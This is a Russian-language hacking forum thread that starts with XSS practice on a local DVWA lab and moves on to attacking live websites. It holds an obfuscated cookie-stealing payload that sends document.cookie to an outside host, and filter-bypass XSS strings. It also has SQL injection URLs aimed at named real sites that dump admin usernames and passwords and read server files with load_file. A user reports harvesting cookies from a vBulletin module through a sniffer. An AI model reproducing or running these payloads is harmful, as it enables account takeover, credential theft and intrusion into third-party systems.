NZT, полностью ответить на твой вопрос не смогу, потому что просто не понял его формулировки. Экранирование кавычек никак не защищает от XSS. Единственное, где экранирование может помешать атаке, это внутри переменной JS при фильтрации угловых скобок и/или слеша. Конструкция "document.write('<script>" не имеет смысла. JS-код создает тег, который нужен, чтобы выполнить JS-код?
нет. пассивная может быть не только get или post, суть её в том что нужно каждый раз передавать в уязвимый параметр свой скрипт. активная же один раз записывается где-то , в бд например, и дальше уже «работает самостоятельно».
Чакэ Спасибо понял , тоесть чтобы пасивная сработала надо чтобы жертва нажала на ссылку , и только при нажатии на ссылку будут высылаться куки , а не при каждом захождении на страницу. M_script, написал скрипт как ты написал но куки не пришли , может потому что в адресной строке этого сайта куда бы я не заходил нет значения id . Все строки адресов только такие http://localhost/denwer/dvwa/vulnerabilities/xss_s/ . В этом дело? А если я в гостевой пишу то что ты написал то у меня в первом случае появляется как ты и написал , слово в слово а во втором случае document.write(\'\'); тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?
В таком виде нормально должно быть: document.write(atob(/PGltZyBzcmM9Imh0dHA6Ly9odHRwei5ydS8xMjMuZ2lmPw==/.source)+escape(document[/co/.source+/okie/.source])+atob(/Ij4=/.source));
на медиуме прокатывает такая штука, как в XSS reflected так и в XSS stored Code: <scr<script>ipt>alert(/xss/)</script> в XSS reflected, там просто замена идет PHP: echo 'Hello ' . str_replace('<script>', '', $_GET['name']); в XSS stored тоже самое считай, только фильтруется переменная $message а $name все той же заменой фильтрует.
Наверное вышла новая версия в которой ничего не ломается )) M_script , trololoman96 , спасибо вам за желание помочь , я уже рад что у меня на low что то получилось , но на медиуме все что вы написали тоже не работает, может у меня что то не так. Единственое что , если кто знает в какой из таких площадок для взлома есть пасивная , а не активная xss, хочу ее испробовать , но не охота все подряд качать и проверять , если кто знает насчет пасивной xss вы мне облегчите задачу. И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.
тут имеется ввиду xss reflected как пассивная и сторед как активная. В reflected, xss пиши в имени, и перед этим либо через оперу отредактируй исходник и убери ограничение в input'е на 10 символов, либо на лету через temper data уже пиши свою xss и все получится
trololoman96, ты мне очень помог , я как раз искал пасивную xss. Ограничение у меня не стоит. Продолжу тренироваться . Спасибо.
Code: http://www.dun[google]glac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,unhex(hex(column_name)),5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x74626c5f61646d696e+limit+0,1-- таблица tbl_admin помогите только именно с этим запросом
там нет таблицы tbl_admin, поэтому ошибка и вылетает Code: http://www.dunglac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,concat_ws%280x3a,user,pass%29,5,6,7,8,9,10,11,12,13+from+admin
Code: http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7-- тут прав не хватает, или я что-то не так делаю?
Нашел в одном модуле для булки xss. Пассивную xss. проблемы: 1) в гугл хроме не передает на снифер данные(остальные браузеры ок) 2) куки передаются такие - bblastvisit=1326457186;%20bblastactivity=0, а bbpasword и sessionhash нет. what the fuck?
1) только для xss В строке? 2) ? + можно ли при пассивной xss оформить перенаправление на другую страницу без js
Code: admin'or+1+and(select+1+from(select+count(*),concat((select+password+from+cosm_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+a не?